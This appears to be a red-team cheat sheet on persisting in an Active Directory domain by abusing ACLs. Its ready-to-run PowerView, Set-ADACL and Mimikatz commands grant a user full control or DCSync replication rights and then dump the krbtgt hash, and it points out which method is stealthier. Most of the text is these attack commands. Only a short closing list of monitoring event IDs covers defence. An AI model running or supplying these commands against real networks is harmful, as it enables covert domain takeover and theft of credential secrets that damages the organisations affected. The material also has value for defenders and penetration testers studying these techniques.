Abusing ACLs

With the privileges of a Domain Admin, we can change the ACL rights for any user we wish to maintain persistence in a network.

Depending on the rights you change and on whom you change them, this can be a stealthy technique provided that no code gets executed on the Domain Controller. One such method is to give a user replication rights to then execute DCSync with and extract the krbtgt hash.

Useful Commands From Powershell

Give a User Full Control Rights over the Domain Object Itself

• I should note this technique could be easily spotted...

# PowerView
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights All -Verbose

# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -Verbose

Give a User Replication Rights

• A much quieter technique than the above. It requires 3 rights to be given:

  1. Replicating Directory Changes

  2. Replicating Directory Changes All

  3. Replicating Directory Changes in Filtered Set

# PowerView
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights DCSync -Verbose

# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -GUIDRight DCSync -Verbose

You Can Then Run DCSync on Any User You Want Afterwards

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

Mitigations

• Monitor Secutiry events:

  • 4662 - Operations on objects

  • 5136 - Modification of Objects

  • 4670 - Changed Object Permissions

• AD ACL Scanner